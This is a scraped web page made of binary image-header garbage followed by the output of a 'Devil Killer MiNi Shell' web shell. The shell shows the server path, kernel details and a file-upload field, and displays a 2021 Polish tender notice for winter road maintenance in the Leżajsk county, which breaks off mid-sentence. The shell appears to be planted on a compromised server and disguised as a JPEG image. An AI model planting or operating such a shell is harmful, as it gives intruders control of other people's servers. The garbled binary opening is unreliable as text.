JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211008/0022635701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Usługi związane z zimowym utrzymaniem dróg powiatowych w sezonie 2021/2022 część 4,5,6,7” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W LEŻAJSKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690587410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Polna 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leżajsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kontakt@zdplezajsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zdplezajsk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Usługi związane z zimowym utrzymaniem dróg powiatowych w sezonie 2021/2022 część 4,5,6,7” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2f38316b-273e-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00226357</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001572/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi związane z zimowym utrzymaniem dróg powiatowych w sezonie 2021/2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zdp_lezajsk <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami, odbywa się przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem platformazakupowa.pl pod adresem<br/>https://platformazakupowa.pl/pn/zdp_lezajsk, zwanej dalej Platformą. Wykonawcy winni zapoznać się z<br/>Regulaminem Platformy, znajdującym się na stronie https://platformazakupowa.pl/strona/1-regulamin,<br/>oraz Instrukcjami dla Wykonawców (link: https://platformazakupowa.pl/strona/45-instrukcje ), w których<br/>zawarto wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>kontakt@zdplezajsk.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, z uwzględnieniem<br/>wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków komunikacji elektronicznej. Przez<br/>środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z<br/>dnia 18 lipca 2002 roku o świadczeniu usług drogą elektroniczną.2. Ofertę, oświadczenia, o których mowa<br/>w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu<br/>udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach<br/>danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim<br/>mowa w pkt. 8.1 składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym, podpisemzaufanym lub podpisem osobistym.3. W przedmiotowym<br/>postępowaniu komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie<br/>oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem strony https://platformazakupowa.pl/pn/zdp_lezajsk zwanej<br/>dalej Platformą. Wykonawcy winni zapoznać się z regulaminem Platformy, znajdującym się na stronie<br/>https://platformazakupowa.pl/strona/1-regulamin , oraz Instrukcjami dla Wykonawców<br/>(link:https://platformazakupowa.pl/strona/45-instrukcje ), w którym zawarto wymagania techniczne i<br/>organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu.4. Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego, powinien posiadać konto na Platformie.Rejestracja i<br/>konto na Platformie jest darmowe. Sposób założenia konta opisany został w instrukcji znajdującej się pod linkiem:https://docs.google.com/document/d/1CETIe4hPE_fnKCUjWGpnw9yWhdbtc0YTlqtgUxMAwRo/edit<br/>Wykonawca posiadający konto na Platformie ma dostęp do formularzy: złożenia, zmiany, wycofania<br/>oferty oraz do formularza do komunikacji. Pozostałe wymagania techniczne i organizacyjne dot.<br/>korespondencji elektronicznej zawarte są w pkt. 11 ROZDZIAŁU I SWZ.W korespondencji kierowanej do<br/>Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania.Formaty<br/>plików muszą być zgodne z krajowymi Ramami Interoperacyjności, o których mowa w Rozporządzeniu<br/>Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych<br/>wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych(t. j. Dz. U. z 2017r. poz. 2247). Szczegóły dotyczące<br/>wymagań technicznych i organizacyjnych zawarte są w pkt 11 SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/zdp_lezajsk</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny w<br/>dokumentach zamówienia (pkt 24 SWZ)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny w<br/>dokumentach zamówienia (pkt 24 SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">231.8.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – Odśnieżanie podstawionym nośnikiem do pługa jednostronnego o ładowności 8-16 t (komplet usługodawcy), </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego,<br/>dotychczasowemu wykonawcy usług zamówienia, polegającego na powtórzeniu podobnych usług,<br/>stanowiących nie więcej niż 30% wartości zamówienia podstawowego, zgodnych z przedmiotem<br/>niniejszego zamówienia. Zamówienie zostanie udzielone, gdy zaistnieje uzasadniona potrzeba i<br/>możliwość rozszerzenia zamówienia podstawowego oraz zostaną zapewnione środki finansowe na ten<br/>cel. Wysokość wynagrodzenia zamówienia polegającego na powtórzeniu podobnych usług zostanie<br/>ustalona w drodze negocjacji z Wykonawcą. Zamówienie zostanie udzielone dotychczasowemu<br/>Wykonawcy pod warunkiem, że: zapewni nie gorszy standard wykonywania nowego zamówienia niż<br/>podstawowego, przy zawieraniu umowy na zamówienie polegające na powtórzeniu podobnych usług –<br/>zaakceptuje istotne warunki umowy odnoszącej się do zamówienia podstawowego z uwzględnieniem<br/>różnic wynikających z wartości, czasu realizacji i innych istotnych okoliczności mających miejsce w chwili<br/>udzielania zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty, stosując<br/>następujące kryteria:<br/>• Cena – 60 pkt<br/>• Czas reakcji – 40 pkt<br/>2. Zasady oceny kryterium „Cena” (C)<br/>Kryterium „Cena”(C) - będzie rozpatrywana na podstawie ceny ofertowej brutto za wykonanie przedmiotu<br/>zamówienia wpisanej przez Wykonawcę w formularzu oferty. W tym kryterium można uzyskać<br/>maksymalnie 60 punktów (znaczenie w ocenie pkt = %). W przypadku kryterium „Cena”(C) - oferta<br/>otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą ze wzoru:<br/>C = [ Cmin: Co] x 60 pkt<br/>gdzie:<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium „Cena”<br/>Cmin – cena najniższa spośród wszystkich ważnych i nieodrzuconych ofert<br/>Co – cena badanej oferty<br/>Ceny należy podać z dokładnością do dwóch miejsc po przecinku.<br/>3. Zasady oceny kryterium czasu reakcji<br/>Czas reakcji - wskaźnik R dla części 8 i 9 - czas dostarczenia materiału od zawiadomienia telefonicznego<br/>/ elektronicznego (e-mail, Fax) przez Zamawiającego<br/>R - liczba punktów uzyskanych przez ofertę w kryterium czasu dostarczenia materiału od zawiadomienia<br/>telefonicznego/elektronicznego (e-mail, Fax) przez Zamawiającego (max – 40 pkt.)<br/>R:<br/>0 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego powyżej 48 godzin,<br/>20 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego do 48 godzin,<br/>40 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego do 24 godzin.<br/>W przypadku niedotrzymania zaoferowanego czasu dostarczenia materiału od zawiadomienia<br/>telefonicznego/elektronicznego (e-mail, Fax) Wykonawca zapłaci Zamawiającemu karę w wysokości<br/>500,00 zł za każde zdarzenie (nie dostarczenie materiału w zaoferowanym terminie) i 0,5 % wartości<br/>brutto opóźnionej dostawy, za każdy dzień opóźnienia.<br/>4. Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie największą liczbę punktów (P)<br/>wyliczoną zgodnie ze wzorem:<br/>P= C + R<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „Cena”<br/>R – liczba punktów uzyskanych w kryterium „Czas reakcji”<br/>Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 – Odśnieżanie podstawionym nośnikiem z pługiem PJ-10, samochód o ładowności 8-16 t (komplet usługodawcy), </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego,<br/>dotychczasowemu wykonawcy usług zamówienia, polegającego na powtórzeniu podobnych usług,<br/>stanowiących nie więcej niż 30% wartości zamówienia podstawowego, zgodnych z przedmiotem<br/>niniejszego zamówienia. Zamówienie zostanie udzielone, gdy zaistnieje uzasadniona potrzeba i<br/>możliwość rozszerzenia zamówienia podstawowego oraz zostaną zapewnione środki finansowe na ten<br/>cel. Wysokość wynagrodzenia zamówienia polegającego na powtórzeniu podobnych usług zostanie<br/>ustalona w drodze negocjacji z Wykonawcą. Zamówienie zostanie udzielone dotychczasowemu<br/>Wykonawcy pod warunkiem, że: zapewni nie gorszy standard wykonywania nowego zamówienia niż<br/>podstawowego, przy zawieraniu umowy na zamówienie polegające na powtórzeniu podobnych usług –<br/>zaakceptuje istotne warunki umowy odnoszącej się do zamówienia podstawowego z uwzględnieniem<br/>różnic wynikających z wartości, czasu realizacji i innych istotnych okoliczności mających miejsce w chwili<br/>udzielania zamówienia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona wyboru najkorzystniejszej oferty, stosując<br/>następujące kryteria:<br/>• Cena – 60 pkt<br/>• Czas reakcji – 40 pkt<br/>2. Zasady oceny kryterium „Cena” (C)<br/>Kryterium „Cena”(C) - będzie rozpatrywana na podstawie ceny ofertowej brutto za wykonanie przedmiotu<br/>zamówienia wpisanej przez Wykonawcę w formularzu oferty. W tym kryterium można uzyskać<br/>maksymalnie 60 punktów (znaczenie w ocenie pkt = %). W przypadku kryterium „Cena”(C) - oferta<br/>otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą ze wzoru:<br/>C = [ Cmin: Co] x 60 pkt<br/>gdzie:<br/>C – ilość punktów jakie otrzyma badana oferta za kryterium „Cena”<br/>Cmin – cena najniższa spośród wszystkich ważnych i nieodrzuconych ofert<br/>Co – cena badanej oferty<br/>Ceny należy podać z dokładnością do dwóch miejsc po przecinku.<br/>3. Zasady oceny kryterium czasu reakcji<br/>Czas reakcji - wskaźnik R dla części 8 i 9 - czas dostarczenia materiału od zawiadomienia telefonicznego<br/>/ elektronicznego (e-mail, Fax) przez Zamawiającego<br/>R - liczba punktów uzyskanych przez ofertę w kryterium czasu dostarczenia materiału od zawiadomienia<br/>telefonicznego/elektronicznego (e-mail, Fax) przez Zamawiającego (max – 40 pkt.)<br/>R:<br/>0 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego powyżej 48 godzin,<br/>20 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego do 48 godzin,<br/>40 pkt - w przypadku deklarowanego czasu dostarczenia materiału liczonego od zawiadomienia<br/>telefonicznego/elektronicznego(e-mail, Fax) przez Zamawiającego wynoszącego do 24 godzin.<br/>W przypadku niedotrzymania zaoferowanego czasu dostarczenia materiału od zawiadomienia<br/>telefonicznego/elektronicznego (e-mail, Fax) Wykonawca zapłaci Zamawiającemu karę w wysokości<br/>500,00 zł za każde zdarzenie (nie dostarczenie materiału w zaoferowanym terminie) i 0,5 % wartości<br/>brutto opóźnionej dostawy, za każdy dzień opóźnienia.<br/>4. Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska łącznie największą liczbę punktów (P)<br/>wyliczoną zgodnie ze wzorem:<br/>P= C + R<br/>gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium „Cena”<br/>R – liczba punktów uzyskanych w kryterium „Czas reakcji”<br/>Oferta w łącznej ocenie oferty może uzyskać maksymalnie 100 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6 – Zwalczanie śliskości oraz odśnieżanie, podstawioną przez usługodawcę<br/>pługo-piaskarką na samochodzie z napędem co najmniej na dwie osie o ładowności 8-16 t (komplet usługodawcy), </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie w okresie 3 lat od udzielenia zamówienia podstawowego,<br/>dotychczasowemu wykonawcy usług zamówienia, polegającego na powtórzeniu podobnych usług,<br/>stanowiących nie więcej niż 30% wartości zamówienia podstawowego, zgodnych z przedmiotem<br/>niniejszego zamówienia. Zamówienie zostanie udzielone, gdy zaistnieje 